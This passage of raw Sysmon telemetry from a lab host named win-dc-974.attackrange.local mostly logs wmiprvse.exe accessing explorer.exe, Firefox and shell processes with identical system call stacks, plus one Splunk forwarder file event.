ll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB74B2D6E9FFD241153F66F48BE681B0,SHA256=9F33F832E69654BDA730CFAB7181B2B5AB6BFC90EBBF6463FF95F537A7C44973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 